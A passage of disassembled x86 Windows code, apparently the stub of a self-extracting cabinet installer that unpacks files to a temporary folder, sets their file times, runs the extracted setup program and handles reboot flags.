; ---------------------------------------------------------------------------
loc_1002888: ; CODE XREF: sub_100269E+1E0�j
cmp esi, [ebp+78h+var_18]
jb short loc_100289D
ja short loc_1002894
cmp eax, [ebp+78h+var_1C]
jbe short loc_100289D
loc_1002894: ; CODE XREF: sub_100269E+1EF�j
mov [ebp+78h+var_1C], eax
mov [ebp+78h+var_18], esi
mov [ebp+78h+var_1], cl
loc_100289D: ; CODE XREF: sub_100269E+18A�j
; sub_100269E+18E�j ...
inc [ebp+78h+Source]
cmp [ebp+78h+Source], 7Ah
jle loc_10027E7
mov eax, dword_1007018
cmp eax, 0CAB00EEEh
jz short loc_10028C4
xor ecx, ecx
cmp [ebp+78h+var_18], ecx
ja short loc_10028E4
jb short loc_10028C4
cmp [ebp+78h+var_1C], eax
jnb short loc_10028E4
loc_10028C4: ; CODE XREF: sub_100269E+216�j
; sub_100269E+21F�j
mov eax, [ebp+78h+var_28]
cmp [ebp+78h+var_18], eax
ja short loc_10028E4
jb short loc_10028D6
mov ecx, [ebp+78h+var_1C]
cmp ecx, [ebp+78h+var_2C]
jnb short loc_10028E4
loc_10028D6: ; CODE XREF: sub_100269E+22E�j
mov ecx, [ebp+78h+var_2C]
mov [ebp+78h+var_18], eax
mov al, [ebp+78h+var_9]
mov [ebp+78h+var_1C], ecx
jmp short loc_10028E7
; ---------------------------------------------------------------------------
loc_10028E4: ; CODE XREF: sub_100269E+21D�j
; sub_100269E+224�j ...
mov al, [ebp+78h+var_1]
loc_10028E7: ; CODE XREF: sub_100269E+244�j
push 0F0000000h ; dwFlags
push 1 ; dwProvType
push edi ; szProvider
mov [ebp+78h+Source], al
push edi ; szContainer
lea eax, [ebp+78h+hProv]
push eax ; phProv
call ds:CryptAcquireContextA ; CryptAcquireContextA
test eax, eax
jz loc_10029BE
mov [ebp+78h+var_24], edi
mov dword ptr [ebp+78h+DeviceName], edi
mov edi, ds:sprintf
loc_1002911: ; CODE XREF: sub_100269E+308�j
lea eax, [ebp+78h+pbBuffer]
push eax ; pbBuffer
push 10h ; dwLen
push [ebp+78h+hProv] ; hProv
call ds:CryptGenRandom ; CryptGenRandom
test eax, eax
jz short loc_100296A
lea eax, [ebp+78h+Source]
push eax
push offset Format ; "%s"
push ebx ; Dest
call edi ; sprintf
xor ecx, ecx
mov cl, [ebp+78h+pbBuffer]
add esp, 0Ch
push 0
pop esi
and ecx, 7
add ecx, 9
mov [ebp+78h+var_28], ecx
jz short loc_100296A
lea ebx, Buffer[eax]
loc_100294C: ; CODE XREF: sub_100269E+2C5�j
movzx eax, [ebp+esi+78h+pbBuffer]
push eax
push offset a02x ; "%02x"
push ebx ; Dest
call edi ; sprintf
add esp, 0Ch
inc esi
inc ebx
inc ebx
cmp esi, [ebp+78h+var_28]
jb short loc_100294C
mov ebx, offset Buffer
loc_100296A: ; CODE XREF: sub_100269E+284�j
; sub_100269E+2A6�j
cmp byte ptr Buffer, 0
jz short loc_1002989
xor esi, esi
inc esi
push esi ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10025EA
test eax, eax
jz short loc_1002990
mov [ebp+78h+var_14], esi
jmp short loc_1002990
; ---------------------------------------------------------------------------
loc_1002989: ; CODE XREF: sub_100269E+2D3�j
mov [ebp+78h+var_24], 1
loc_1002990: ; CODE XREF: sub_100269E+2E4�j
; sub_100269E+2E9�j
inc dword ptr [ebp+78h+DeviceName]
cmp [ebp+78h+var_14], 0
jnz short loc_10029AC
cmp [ebp+78h+var_24], 0
jnz short loc_10029AC
cmp dword ptr [ebp+78h+DeviceName], 2710h
jb loc_1002911
loc_10029AC: ; CODE XREF: sub_100269E+2F9�j
; sub_100269E+2FF�j
push 0 ; dwFlags
push [ebp+78h+hProv] ; hProv
call ds:CryptReleaseContext ; CryptReleaseContext
xor edi, edi
cmp [ebp+78h+var_14], edi
jnz short loc_1002A1C
loc_10029BE: ; CODE XREF: sub_100269E+261�j
push ebx
push offset aTempExt ; "temp\\ext"
lea eax, [ebp+78h+Source]
push eax
call sub_100144B
mov esi, eax
lea eax, [ebp+78h+SystemTime]
push eax ; lpSystemTime
call ds:GetSystemTime ; GetSystemTime
lea eax, [ebp+78h+FileTime]
push eax ; lpFileTime
lea eax, [ebp+78h+SystemTime]
push eax ; lpSystemTime
call ds:SystemTimeToFileTime ; SystemTimeToFileTime
mov eax, [ebp+78h+FileTime.dwLowDateTime]
imul eax, dword_1007010
push esi
and eax, 0FFFFh
push eax
call sub_100150B
xor esi, esi
inc esi
push esi ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10025EA
test eax, eax
jnz short loc_1002A19
mov [ebp+78h+var_1C], edi
mov [ebp+78h+var_18], edi
jmp loc_10027B2
; ---------------------------------------------------------------------------
loc_1002A19: ; CODE XREF: sub_100269E+36E�j
mov [ebp+78h+var_14], esi
loc_1002A1C: ; CODE XREF: sub_100269E+120�j
; sub_100269E+31E�j
cmp dword_1017C20, edi
jnz loc_1002ABE
cmp dword_1007030, edi
jnz short loc_1002A46
mov eax, dword_1007010
push 3
pop ecx
mul ecx
cmp [ebp+78h+var_18], edx
ja short loc_1002ABE
jb short loc_1002A46
cmp [ebp+78h+var_1C], eax
jnb short loc_1002ABE
loc_1002A46: ; CODE XREF: sub_100269E+390�j
; sub_100269E+3A1�j ...
push edi ; dwInitParam
push offset DialogFunc ; lpDialogFunc
push hWnd ; hWndParent
push 6Bh ; lpTemplateName
push hInstance ; hInstance
call ds:DialogBoxParamA ; DialogBoxParamA
cmp eax, 0FFFFFFFFh
jz loc_100270D
cmp eax, edi
jz short loc_1002AB7
cmp byte ptr [eax], 0
jz short loc_1002AB7
mov ecx, eax
lea esi, [ecx+1]
loc_1002A77: ; CODE XREF: sub_100269E+3DE�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_1002A77
sub ecx, esi
inc ecx
cmp ecx, 104h
jnb short loc_1002AD2
mov edx, ebx
sub edx, eax
loc_1002A8D: ; CODE XREF: sub_100269E+3F7�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_1002A8D
push 0 ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10025EA
test eax, eax
jz short loc_1002AAD
mov [ebp+78h+var_14], 1
loc_1002AAD: ; CODE XREF: sub_100269E+406�j
cmp [ebp+78h+var_14], 0
jnz short loc_1002AD9
xor edi, edi
jmp short loc_1002A46
; ---------------------------------------------------------------------------
loc_1002AB7: ; CODE XREF: sub_100269E+3CD�j
; sub_100269E+3D2�j
push 4C7h
jmp short loc_1002AD4
; ---------------------------------------------------------------------------
loc_1002ABE: ; CODE XREF: sub_100269E+384�j
; sub_100269E+39F�j ...
cmp [ebp+78h+var_14], edi
jnz short loc_1002AD9
push 1 ; int
push [ebp+78h+lpSecurityAttributes] ; lpSecurityAttributes
push ebx ; int
call sub_10025EA
test eax, eax
jnz short loc_1002AD9
loc_1002AD2: ; CODE XREF: sub_100269E+3E9�j
push 52h ; dwMessageId
loc_1002AD4: ; CODE XREF: sub_100269E+71�j
; sub_100269E+41E�j
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1002AD9: ; CODE XREF: sub_100269E+413�j
; sub_100269E+423�j ...
pop esi
loc_1002ADA: ; CODE XREF: sub_100269E+4E�j
pop edi
pop ebx
add ebp, 78h
leave
retn
sub_100269E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002AE1 proc near ; DATA XREF: start_0+2E7�o
PathName = byte ptr -118h
FileTime = _FILETIME ptr -14h
CreationTime = FILETIME ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 118h
mov eax, [ebp+arg_0]
push esi
push edi
xor edi, edi
cmp eax, edi
jz loc_1002CC1
cmp eax, 2
jz loc_1002BE9
cmp eax, 3
jnz loc_1002CC1
mov esi, [ebp+arg_4]
lea eax, [ebp+FileTime]
push eax ; lpFileTime
xor eax, eax
mov ax, [esi+1Ah]
push eax ; wFatTime
xor eax, eax
mov ax, [esi+18h]
push eax ; wFatDate
call ds:DosDateTimeToFileTime ; DosDateTimeToFileTime
lea eax, [ebp+CreationTime]
push eax ; lpFileTime
lea eax, [ebp+FileTime]
push eax ; lpLocalFileTime
call ds:LocalFileTimeToFileTime ; LocalFileTimeToFileTime
lea eax, [ebp+CreationTime]
push eax ; lpLastWriteTime
lea eax, [ebp+CreationTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push dword ptr [esi+14h] ; hFile
call ds:SetFileTime ; SetFileTime
push dword ptr [esi+14h] ; hObject
call ds:CloseHandle ; CloseHandle
cmp dword_1007038, edi
mov hObject, edi
jnz short loc_1002B83
mov eax, hWnd
cmp eax, edi
jnz short loc_1002B73
loc_1002B69: ; CODE XREF: sub_1002AE1+142�j
push 4C7h
jmp loc_1002CBC
; ---------------------------------------------------------------------------
loc_1002B73: ; CODE XREF: sub_1002AE1+86�j
push edi ; lParam
push edi ; wParam
push 405h ; Msg
push 6Ah ; nIDDlgItem
push eax ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_1002B83: ; CODE XREF: sub_1002AE1+7D�j
cmp [esi], edi
jz short loc_1002BE1
push dword ptr [esi+4]
call sub_10020C7
mov dword_100776C, eax
lea eax, [ebp+PathName]
push eax
push dword ptr [esi+4]
push offset Buffer
call sub_100144B
mov esi, eax
jmp short loc_1002BB2
; ---------------------------------------------------------------------------
loc_1002BAC: ; CODE XREF: sub_1002AE1+D9�j
cmp byte ptr [esi], 5Ch
jz short loc_1002BBC
dec esi
loc_1002BB2: ; CODE XREF: sub_1002AE1+C9�j
lea eax, [ebp+PathName]
cmp esi, eax
ja short loc_1002BAC
loc_1002BBC: ; CODE XREF: sub_1002AE1+CE�j
lea eax, [ebp+PathName]
push eax
call sub_10020C7
mov dword_10078BC, eax
and byte ptr [esi], 0
lea eax, [ebp+PathName]
push eax
call sub_10020C7
mov lpCurrentDirectory, eax
loc_1002BE1: ; CODE XREF: sub_1002AE1+A4�j
xor eax, eax
inc eax
jmp loc_1002CC3
; ---------------------------------------------------------------------------
loc_1002BE9: ; CODE XREF: sub_1002AE1+1B�j
cmp dword_1007030, edi
mov esi, [ebp+arg_4]
jnz short loc_1002C14
cmp dword_1007768, edi
jnz short loc_1002C14
push offset aCdtag_1 ; "cdtag.1"
push dword ptr [esi+4] ; Str
call ds:strstr ; strstr
test eax, eax
pop ecx
pop ecx
jnz loc_1002CC1
loc_1002C14: ; CODE XREF: sub_1002AE1+111�j
; sub_1002AE1+119�j
cmp dword_1007038, edi
jnz short loc_1002C38
mov eax, hWnd
cmp eax, edi
jz loc_1002B69
push dword ptr [esi+4] ; lParam
push edi ; wParam
push 0Ch ; Msg
push 68h ; nIDDlgItem
push eax ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_1002C38: ; CODE XREF: sub_1002AE1+139�j
push ebx
lea eax, [ebp+PathName]
push eax
push dword ptr [esi+4]
push offset Buffer
call sub_100144B
mov esi, ds:CreateFileA
push edi
mov ebx, 80h
push ebx
push 2
push edi
mov [ebp+var_4], 1
mov edi, 40000000h
jmp short loc_1002C8A
; ---------------------------------------------------------------------------
loc_1002C6B: ; CODE XREF: sub_1002AE1+1BB�j
xor eax, eax
cmp [ebp+var_4], eax
jz short loc_1002CBA
push eax ; int
push eax ; lpSecurityAttributes
mov [ebp+var_4], eax
lea eax, [ebp+PathName]
push eax ; lpPathName
call sub_1002596
push 0 ; hTemplateFile
push ebx ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
loc_1002C8A: ; CODE XREF: sub_1002AE1+188�j
push 3 ; dwShareMode
lea eax, [ebp+PathName]
push edi ; dwDesiredAccess
push eax ; lpFileName
call esi ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_1002C6B
mov hObject, eax
lea eax, [ebp+PathName]
push eax
push offset off_1007000
call sub_1002571
mov eax, [ebp+arg_0]
pop ebx
jmp short loc_1002CC3
; ---------------------------------------------------------------------------
loc_1002CBA: ; CODE XREF: sub_1002AE1+18F�j
push 0FFFFFFFFh ; dwMessageId
loc_1002CBC: ; CODE XREF: sub_1002AE1+8D�j
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1002CC1: ; CODE XREF: sub_1002AE1+12�j
; sub_1002AE1+24�j ...
xor eax, eax
loc_1002CC3: ; CODE XREF: sub_1002AE1+103�j
; sub_1002AE1+1D7�j
pop edi
pop esi
leave
retn
sub_1002AE1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
start_0 proc near ; CODE XREF: start�j
var_88 = dword ptr -88h
uExitCode = dword ptr -84h
hFile = dword ptr -80h
ProcessInformation= _PROCESS_INFORMATION ptr -7Ch
ThreadId = dword ptr -6Ch
var_68 = byte ptr -68h
var_62 = word ptr -62h
var_50 = byte ptr -50h
StartupInfo = _STARTUPINFOA ptr -44h
sub esp, 88h
push ebx
push esi
push edi
push 0FFFFFFFFh ; dwSpinCount
xor ebx, ebx
mov esi, 80000000h
push offset CriticalSection ; lpCriticalSection
mov [esp+9Ch+uExitCode], ebx
mov dword_1007448, esi
call ds:InitializeCriticalSectionAndSpinCount ; InitializeCriticalSectionAndSpinCount
xor edi, edi
inc edi
mov dword_1007024, edi
call ds:InitCommonControls ; InitCommonControls
call ds:GetProcessHeap ; GetProcessHeap
mov hHeap, eax
call sub_10017B4
call sub_1002272
mov eax, lDistanceToMove
and eax, 0FFFF0000h
cmp eax, 0CAB00000h
jnz short loc_1002D2A
push 20000001h
jmp short loc_1002D86
; ---------------------------------------------------------------------------
loc_1002D2A: ; CODE XREF: start_0+5A�j
test lDistanceToMove, esi
jnz short loc_1002D38
mov dword_1007030, edi
loc_1002D38: ; CODE XREF: start_0+69�j
and byte ptr lDistanceToMove+3, 7Fh
push ebx ; lpName
push ebx ; bInitialState
push ebx ; bManualReset
push ebx ; lpEventAttributes
call ds:CreateEventA ; CreateEventA
mov hEvent, eax
lea eax, [esp+94h+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call ds:CreateThread ; CreateThread
test eax, eax
jnz short loc_1002D6A
push 8
jmp short loc_1002D86
; ---------------------------------------------------------------------------
loc_1002D6A: ; CODE XREF: start_0+9D�j
push 0FFFFFFFFh ; dwMilliseconds
push hEvent ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
mov eax, hWnd
cmp eax, ebx
jnz short loc_1002D8B
push 4C7h ; dwMessageId
loc_1002D86: ; CODE XREF: start_0+61�j start_0+A1�j
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1002D8B: ; CODE XREF: start_0+B8�j
cmp dword_1007038, ebx
mov esi, ds:SendDlgItemMessageA
jz short loc_1002DC5
push 1F4h ; dwMilliseconds
call ds:Sleep ; Sleep
push ebx ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
push hWndNewParent ; hWndNewParent
push hWnd ; hWndChild
call ds:SetParent ; SetParent
jmp short loc_1002E05
; ---------------------------------------------------------------------------
loc_1002DC5: ; CODE XREF: start_0+D0�j
push lParam ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 68h ; nIDDlgItem
push eax ; hDlg
call esi ; SendDlgItemMessageA
mov eax, dword_1007010
add eax, 0FFFFh
shr eax, 10h
shl eax, 10h
push eax ; lParam
push ebx ; wParam
push 401h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push ebx ; lParam
push edi ; wParam
push 404h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
loc_1002E05: ; CODE XREF: start_0+FC�j
push ebp
push ebx
push ebx
push offset NumberOfBytesRead ; lpFileName
call sub_1001F1B
mov edi, dword_1007010
or [esp+0A4h+var_88], 0FFFFFFFFh
add esp, 0Ch
cmp edi, ebx
mov [esp+98h+hFile], eax
jz short loc_1002E7D
loc_1002E28: ; CODE XREF: start_0+1AE�j
mov eax, 10000h
cmp edi, eax
mov ebp, edi
jbe short loc_1002E35
mov ebp, eax
loc_1002E35: ; CODE XREF: start_0+16A�j
push ebp ; NumberOfBytesRead
push offset pSid ; lpBuffer
push [esp+0A0h+hFile] ; hFile
call sub_1001F5A
add esp, 0Ch
push ebp
push offset pSid
push [esp+0A0h+var_88]
call sub_10017DE
cmp dword_1007038, ebx
mov [esp+98h+var_88], eax
jnz short loc_1002E73
push ebx ; lParam
push ebx ; wParam
push 405h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
loc_1002E73: ; CODE XREF: start_0+199�j
sub edi, ebp
jnz short loc_1002E28
cmp [esp+98h+var_88], ebx
jz short loc_1002E87
loc_1002E7D: ; CODE XREF: start_0+15F�j
push 20000001h ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1002E87: ; CODE XREF: start_0+1B4�j
lea eax, [esp+98h+var_50]
push eax
push ebx
push offset sub_10014E0
push offset sub_10014C1
push offset sub_1001F82
push offset sub_1001F5A
push offset sub_1001F1B
push offset sub_10014AE
push offset sub_1001EFD
call sub_1003202
push ebx ; dwMoveMethod
push ebx ; lDistanceToMove
push [esp+0C4h+hFile] ; hFile
mov [esp+0C8h+var_88], eax
call sub_10014E0
lea eax, [esp+0C8h+var_68]
push eax
push [esp+0CCh+hFile]
push [esp+0D0h+var_88]
call sub_1003292
add esp, 3Ch
test eax, eax
jnz short loc_1002EE7
push 20000001h ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1002EE7: ; CODE XREF: start_0+214�j
cmp dword_1007038, ebx
jnz short loc_1002EFC
push ebx ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
loc_1002EFC: ; CODE XREF: start_0+226�j
call sub_100269E
cmp dword_1007038, ebx
mov edi, ds:LoadStringA
mov ebp, offset Caption
jnz loc_1002FAC
push 104h ; cchBufferMax
push ebp ; lpBuffer
push 20000004h ; uID
push hInstance ; hInstance
call edi ; LoadStringA
push 104h ; cchBufferMax
push offset FileName ; lpBuffer
push 20000006h ; uID
push hInstance ; hInstance
call edi ; LoadStringA
push ebp ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 65h ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push offset FileName ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 66h ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push offset Buffer ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 69h ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push ebx ; lParam
push ebx ; wParam
push 402h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
movzx eax, [esp+98h+var_62]
shl eax, 10h
push eax ; lParam
push ebx ; wParam
push 401h ; Msg
push 6Ah ; nIDDlgItem
push hWnd ; hDlg
call esi ; SendDlgItemMessageA
push 5 ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
loc_1002FAC: ; CODE XREF: start_0+24B�j
push ebx
push ebx
push offset sub_1002AE1
push ebx
push offset dword_100119C
push offset NumberOfBytesRead
push [esp+0B0h+var_88]
call sub_1004170
add esp, 1Ch
test eax, eax
jnz short loc_1002FD8
push 20000001h ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1002FD8: ; CODE XREF: start_0+305�j
mov ecx, dword_1017C20
cmp ecx, ebx
mov eax, hWnd
jnz short loc_1002FF5
cmp eax, ebx
jnz short loc_1002FF5
push 4C7h ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_1002FF5: ; CODE XREF: start_0+31E�j start_0+322�j
cmp dword_10078BC, ebx
jz loc_1003152
cmp dword_1007030, ebx
jnz loc_1003152
cmp dword_1007038, ebx
jnz short loc_1003023
push dword_100776C ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 68h ; nIDDlgItem
push eax ; hDlg
call esi ; SendDlgItemMessageA
loc_1003023: ; CODE XREF: start_0+34C�j
mov eax, dword_10078BC
mov esi, offset Value
mov edx, esi
sub edx, eax
loc_1003031: ; CODE XREF: start_0+372�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_1003031
push offset aUpdateUpdate_e ; "\\update\\update.exe"
push esi ; Str
call ds:strstr ; strstr
cmp eax, ebx
pop ecx
pop ecx
jz short loc_100305B
push esi ; lpValue
push offset a_sfx_cab_exe_p ; "_SFX_CAB_EXE_PATH"
mov [eax], bl
call ds:SetEnvironmentVariableA ; SetEnvironmentVariableA
loc_100305B: ; CODE XREF: start_0+384�j
call sub_1001BF1
mov eax, dword_10078BC
mov edx, ebp
sub edx, eax
loc_1003069: ; CODE XREF: start_0+3AA�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
cmp cl, bl
jnz short loc_1003069
mov eax, dword_100702C
mov esi, eax
loc_100307A: ; CODE XREF: start_0+3B8�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_100307A
mov edi, ebp
sub eax, esi
dec edi
loc_1003086: ; CODE XREF: start_0+3C5�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_1003086
mov ecx, eax
shr ecx, 2
rep movsd
push 11h
mov ecx, eax
and ecx, 3
rep movsb
pop ecx
xor eax, eax
lea edi, [esp+98h+StartupInfo]
rep stosd
inc eax
mov [esp+98h+StartupInfo.dwFlags], eax
mov [esp+98h+StartupInfo.wShowWindow], ax
lea eax, [esp+98h+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [esp+9Ch+StartupInfo]
push eax ; lpStartupInfo
push lpCurrentDirectory ; lpCurrentDirectory
mov [esp+0A4h+StartupInfo.cb], 44h
push ebx ; lpEnvironment
push 20h ; dwCreationFlags
push ebx ; bInheritHandles
push ebx ; lpThreadAttributes
push ebx ; lpProcessAttributes
push ebp ; lpCommandLine
push ebx ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jnz short loc_10030E8
push 0FFFFFFFFh ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_10030E8: ; CODE XREF: start_0+418�j
cmp dword_1007038, ebx
jnz short loc_10030FD
push ebx ; nCmdShow
push hWnd ; hWnd
call ds:ShowWindow ; ShowWindow
loc_10030FD: ; CODE XREF: start_0+427�j
mov eax, [esp+98h+ProcessInformation.hProcess]
push 0FFFFFFFFh ; dwMilliseconds
push eax ; hHandle
mov hProcess, eax
call ds:WaitForSingleObject ; WaitForSingleObject
lea eax, [esp+98h+uExitCode]
push eax ; lpExitCode
push [esp+9Ch+ProcessInformation.hProcess] ; hProcess
mov hProcess, ebx
call ds:GetExitCodeProcess ; GetExitCodeProcess
push [esp+98h+ProcessInformation.hProcess] ; hObject
mov esi, ds:CloseHandle
call esi ; CloseHandle
push [esp+98h+ProcessInformation.hThread] ; hObject
call esi ; CloseHandle
call sub_10013BC
cmp [esp+98h+uExitCode], 0CABF00D1h
jnz short loc_100314B
mov [esp+98h+uExitCode], ebx
jmp short loc_1003184
; ---------------------------------------------------------------------------
loc_100314B: ; CODE XREF: start_0+47C�j
call sub_10015BE
jmp short loc_1003184
; ---------------------------------------------------------------------------
loc_1003152: ; CODE XREF: start_0+334�j start_0+340�j
cmp ecx, ebx
jnz short loc_1003184
push ebx ; nCmdShow
push eax ; hWnd
call ds:ShowWindow ; ShowWindow
push 104h ; cchBufferMax
push ebp ; lpBuffer
push 20000002h ; uID
push hInstance ; hInstance
call edi ; LoadStringA
push 10030h ; uType
push ebp ; lpCaption
push ebp ; lpText
push hWnd ; hWnd
call ds:MessageBoxA ; MessageBoxA
loc_1003184: ; CODE XREF: start_0+482�j start_0+489�j ...
mov eax, dword_1007448
test eax, eax
js short loc_10031D9
mov esi, 40000000h
test eax, esi
jnz short loc_10031CF
push dword_100744C ; int
mov ecx, eax
shr ecx, 4
and ecx, 1
push offset dword_1007450 ; int
push ecx ; hLibModule
mov ecx, eax
shr ecx, 1
and ecx, 1
push ecx ; bForceAppsClosed
and eax, 1
push eax ; bRebootAfterShutdown
call sub_1001D83
test eax, eax
mov eax, dword_1007448
jnz short loc_10031CB
or eax, esi
mov dword_1007448, eax
loc_10031CB: ; CODE XREF: start_0+4FB�j
test eax, esi
jz short loc_10031D9
loc_10031CF: ; CODE XREF: start_0+4CD�j
push 20000007h ; dwMessageId
call sub_1001CB9
; ---------------------------------------------------------------------------
loc_10031D9: ; CODE XREF: start_0+4C4�j start_0+506�j
cmp dword_1007024, ebx
jz short loc_10031F2
push offset CriticalSection ; lpCriticalSection
call ds:DeleteCriticalSection
mov dword_1007024, ebx
loc_10031F2: ; CODE XREF: start_0+518�j
push [esp+98h+uExitCode] ; uExitCode
call ds:ExitProcess ; ExitProcess
start_0 endp
; ---------------------------------------------------------------------------
db 0CCh
; [00000005 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1003202 proc near ; CODE XREF: start_0+1E9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push 804h
call esi
pop ecx
xor ecx, ecx
cmp eax, ecx
jnz short loc_1003226
push ecx
push 5
push [ebp+arg_20]
call sub_1004350
xor eax, eax
jmp short loc_100328F
; ---------------------------------------------------------------------------
loc_1003226: ; CODE XREF: sub_1003202+13�j
mov edx, [ebp+arg_4]
or dword ptr [eax+88h], 0FFFFFFFFh
or dword ptr [eax+84h], 0FFFFFFFFh
mov [eax+4], edx
mov edx, [ebp+arg_8]
mov [eax+0Ch], edx
mov edx, [ebp+arg_C]
mov [eax+10h], edx
mov edx, [ebp+arg_10]
mov [eax+14h], edx
mov edx, [ebp+arg_14]
mov [eax+18h], edx
mov edx, [ebp+arg_18]
mov [eax+1Ch], edx
mov edx, [ebp+arg_1C]
mov [eax+20h], edx
mov edx, [ebp+arg_20]
mov [eax+48h], ecx
mov [eax+44h], ecx
mov [eax+4Ch], ecx
mov ecx, 0FFFFh
mov [eax+8], esi
mov [eax], edx
mov word ptr [eax+0B2h], 0Fh
mov [eax+0A0h], ecx
mov [eax+0A8h], ecx
mov [eax+0A4h], ecx
loc_100328F: ; CODE XREF: sub_1003202+22�j
pop esi
pop ebp
retn
sub_1003202 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1003292 proc near ; CODE XREF: start_0+20A�p
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push esi
mov esi, [ebp+arg_0]
push 24h
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
call dword ptr [esi+10h]
add esp, 0Ch
cmp eax, 24h
jnz short loc_10032CF
cmp [ebp+var_24], 4643534Dh
jnz short loc_10032CF
cmp [ebp+var_C], 103h
jz short loc_10032D3
movzx eax, [ebp+var_C]
push eax
push 3
push dword ptr [esi]
call sub_1004350
loc_10032CF: ; CODE XREF: sub_1003292+1C�j
; sub_1003292+25�j
xor eax, eax
jmp short loc_100331B
; ---------------------------------------------------------------------------
loc_10032D3: ; CODE XREF: sub_1003292+2D�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_1C]
mov [eax], ecx
mov cx, [ebp+var_A]
mov [eax+4], cx
mov cx, [ebp+var_8]
mov [eax+6], cx
mov cx, [ebp+var_4]
mov [eax+8], cx
mov cx, [ebp+var_2]
mov [eax+0Ah], cx
movzx ecx, [ebp+var_6]
mov edx, ecx
shr edx, 2
and edx, 1
mov [eax+0Ch], edx
mov edx, ecx
and edx, 1
and ecx, 2
mov [eax+10h], edx
mov [eax+14h], ecx
xor eax, eax
inc eax
loc_100331B: ; CODE XREF: sub_1003292+3F�j
pop esi
leave
retn
sub_1003292 endp
; =============== S U B R O U T I N E =======================================
sub_100331E proc near ; CODE XREF: sub_10039B0+2A3�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
lea eax, [esi+7BCh]
lea ecx, [esi+3B7h]
mov [eax+4], ecx
lea ecx, [esi+4B8h]
mov [eax+8], ecx
lea ecx, [esi+5B9h]
mov [eax+0Ch], ecx
mov ecx, [esi+38h]
mov [eax+10h], ecx
mov cx, [esi+70h]
push edi
mov [eax+1Eh], cx
mov cx, [esi+72h]
push eax
xor ebx, ebx
push ebx
lea edi, [esi+7E4h]
mov [eax+20h], cx
call dword ptr [esi+24h]
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_10033A7
cmp [esi+28h], ebx
jz short loc_10033B5
mov [edi], ebx
mov eax, [esi+38h]
mov [edi+4], eax
mov eax, [esi+4Ch]
mov [edi+8], eax
mov ax, [esi+0A0h]
mov [edi+0Ch], ax
mov ax, [esi+70h]
mov [edi+0Eh], ax
movzx eax, word ptr [esi+72h]
push edi
